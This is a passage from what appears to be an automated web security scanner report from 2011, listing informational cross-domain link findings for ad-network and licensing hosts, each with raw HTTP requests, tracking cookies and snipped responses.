Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=7937131853506544491&fpid=12&nu=n&t=&sp=n&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:45:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1">here</A>
...[SNIP]...

11.18. http://delivery.steelhousemedia.com/serve previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The page was loaded from a URL containing a query string:

http://delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=

The response contains the following link to another domain:

http://roia.biz/im/v/nrCFvq1BAAGXHUMAAAsDQgAAtu0-A/p

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

11.19. http://dp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dp.specificclick.net/?v=27&d=54&nwk=1&y=2&newused=new

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?v=27&d=54&nwk=1&y=2&newused=new HTTP/1.1
Host: dp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.vitimb.com/new-inventory
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Thu, 23 Jun 2011 11:13:02 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1">here</a>
...[SNIP]...

11.20. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308856691&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Fcategories%2Fcategory%2Ft-sql-powershell-scripting&dt=1308838691808&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308838691823&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308838668&ga_hid=1701678051&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&ref=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&fu=0&ifi=1&dtd=32&xpc=6vRjOQpsSA&p=http%3A//www.sqlmag.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=lC2SdqOvB0CULZJ2o68HQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQKCKN4OvYNZW_ayDGovBdy8lSwNOAAAAAFowAAC1AAAANQEAAAIAAABtowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0ArAQBAgUCAQQAAAAAkh_v_AAAAAA.&tt_code=vert-343&udj=uf%28%27a%27%2C+15288%2C+1308838693%29%3Buf%28%27r%27%2C+369517%2C+1308838693%29%3Bppv%2811776%2C+%276257295039214881440%27%2C+1308838693%2C+1311430693%2C+62058%2C+25553%29%3B&cnd=!9SSErwjq5AMQ7cYWGAAg0ccBMAA43AFAAEi1AlAAWABgVWgAcBp4puMBgAG2AYgB6kSQAQGYAQGgAQGoAQOwAQG5AcrmMqCjrwdAwQHK5jKgo68HQMkBDYnuKtqU7z_QAQDZAQAAAAAAAPA_4AEA&ccd=!hAX0Lgjq5AMQ7cYWGNHHASAA&referrer=http://www.sqlmag.com/categories/category/t-sql-powershell-scripting&pp=TgNLJQADgooK7F3hcpxpnuMo51wT9E1gpZAvmA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJz9mJUsDToqFDuG7sQee0_GUB-_675oCp439xBrj246PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0wMDgzMDMzNDgyMjM1MDcxsgEOd3d3LnNxbG1hZy5jb226AQozMDB4MjUwX2FzyAEJ2gFEaHR0cDovL3d3dy5zcWxtYWcuY29tL2NhdGVnb3JpZXMvY2F0ZWdvcnkvdC1zcWwtcG93ZXJzaGVsbC1zY3JpcHRpbmeYAvYTwAIEyAKrgqUOqAMB6APXAugD3AX1AwIAAESABq6xlomLuorgeQ%26num%3D1%26sig%3DAGiWqtzVjKC-oZZvJO81emr6TpLC3c-7mw%26client%3Dca-pub-0083033482235071%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308856691&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Fcategories%2Fcategory%2Ft-sql-powershell-scripting&dt=1308838691808&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308838691823&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308838668&ga_hid=1701678051&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&ref=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&fu=0&ifi=1&dtd=32&xpc=6vRjOQpsSA&p=http%3A//www.sqlmag.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

11.21. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308854679&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&dt=1308836679382&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308836679520&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308836680&ga_hid=1579538531&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895142&fu=0&ifi=1&dtd=397&xpc=UAP7AHFP9v&p=http%3A//www.sqlmag.com

The response contains the following link to another domain:

http://a.adroll.com/j/rolling.js

Request

GET /pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308854679&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&dt=1308836679382&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308836679520&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308836680&ga_hid=1579538531&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895142&fu=0&ifi=1&dtd=397&xpc=UAP7AHFP9v&p=http%3A//www.sqlmag.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

11.22. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1417235232628100&output=html&h=250&slotname=4670125536&w=300&lmt=1308854692&skip=3&flash=10.3.181&url=http%3A%2F%2Fwww.techradar.com%2Fnews%2Fcomputing%2Finternet%2Fuk-most-paranoid-about-computer-security-suggests-study-969910&dt=1308836692577&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308836692582&frm=4&adk=1143442889&ga_vid=538846291.1308836687&ga_sid=1308836687&ga_hid=1362617004&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&fu=0&ifi=2&dtd=13&xpc=KJJBDJ6ki9&p=http%3A//www.techradar.com

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CI-elJGJ7vfStwEQrAIY-gEyCLZdGnkPfLfI
http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910%26hl%3Den%26client%3Dca-pub-1417235232628100%26adU%3Dgoogle.com/chromebook%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEVU8j9y3DznmHjvRS9M6TtTQf-Og

Request

GET /pagead/ads?client=ca-pub-1417235232628100&output=html&h=250&slotname=4670125536&w=300&lmt=1308854692&skip=3&flash=10.3.181&url=http%3A%2F%2Fwww.techradar.com%2Fnews%2Fcomputing%2Finternet%2Fuk-most-paranoid-about-computer-security-suggests-study-969910&dt=1308836692577&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308836692582&frm=4&adk=1143442889&ga_vid=538846291.1308836687&ga_sid=1308836687&ga_hid=1362617004&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&fu=0&ifi=2&dtd=13&xpc=KJJBDJ6ki9&p=http%3A//www.techradar.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 23 Jun 2011 13:44:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 4299
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CI-elJGJ7vfStwEQrAIY-gEyCLZdGnkPfLfI">
...[SNIP]...
Z2dlc3RzLXN0dWR5LTk2OTkxMLgCGKgDAegDuwLoA4YD6AMF9QMCAABE%26num%3D1%26sig%3DAGiWqtzbwc7nw0MhugkybwLV6pmIfLCEbg%26client%3Dca-pub-1417235232628100%26adurl%3Dhttp://www.google.com/chromebook/buynow.html"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CI-elJGJ7vfStwEQrAIY-gEyCLZdGnkPfLfI" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUOijVkMDTv-ZE8y0sQeX2vDWBvHhgo4C4f6r0RzAjbcBoJfTARABGAEg-fKWDTgAUOLDx9IGYMnW8obIo_waoAH99cj2A7IBEXd3dy50ZWNocmFkYXIuY29tugEKMzAweDI1MF9hc8gBBNoBb2h0dHA6Ly93d3cudGVjaHJhZGFyLmNvbS9uZXdzL2NvbXB1dGluZy9pbnRlcm5ldC91ay1tb3N0LXBhcmFub2lkLWFib3V0LWNvbXB1dGVyLXNlY3VyaXR5LXN1Z2dlc3RzLXN0dWR5LTk2OTkxMLgCGKgDAegDuwLoA4YD6AMF9QMCAABE%26num%3D1%26sig%3DAGiWqtzbwc7nw0MhugkybwLV6pmIfLCEbg%26client%3Dca-pub-1417235232628100%26adurl%3Dhttp://www.google.com/chromebook/buynow.html" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910%26hl%3Den%26client%3Dca-pub-1417235232628100%26adU%3Dgoogle.com/chromebook%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEVU8j9y3DznmHjvRS9M6TtTQf-Og" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...

11.23. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D7340781&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3f

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/15017-130144-34236-2?mpt=7340781

Request

GET /content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D7340781&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:45:31 GMT
Server: Apache
Last-Modified: Fri, 10 Jun 2011 21:24:30 GMT
ETag: "704c39-fa5-4a56231ef7f80"
Accept-Ranges: bytes
Content-Length: 4707
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/15017-130144-34236-2?mpt=7340781" target="_blank"><img src="http://img-cdn.mediaplex.com/0/15017/130144/VNXe_SQL_enterprise_640X480_1.gif" width="640" height="480" border="0" alt="">
...[SNIP]...

11.24. http://license.icopyright.net/rights/offer.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/offer.act

Issue detail

The page was loaded from a URL containing a query string:

http://license.icopyright.net/rights/offer.act?inprocess=t&sid=18&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js
http://www.clipandcopy.com/
http://www.windowsitpro.com/

Request

GET /rights/offer.act?inprocess=t&sid=18&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:09 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
</script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js"></script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js"></script>
...[SNIP]...
<div id="logo_wrap">
<a href="http://www.windowsitpro.com" target="_blank">
<img class="pubn_logo" src="assetContent.act?id=346"
alt="Windows IT Pro"/>
...[SNIP]...
<td align="left">
<a href="http://www.windowsitpro.com" target="_blank">Windows IT Pro</a>
...[SNIP]...
</a>
|
<a href="http://www.clipandcopy.com/" target="_blank">Clip&Copy®</a>
...[SNIP]...

11.25. http://license.icopyright.net/rights/tag.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/tag.act

Issue detail

The page was loaded from a URL containing a query string:

http://license.icopyright.net/rights/tag.act?tag=7.7009

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js
http://www.clipandcopy.com/
http://www.penton.com/
http://www.windowsitpro.com/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:17:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; Path=/rights
Content-Length: 7404
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
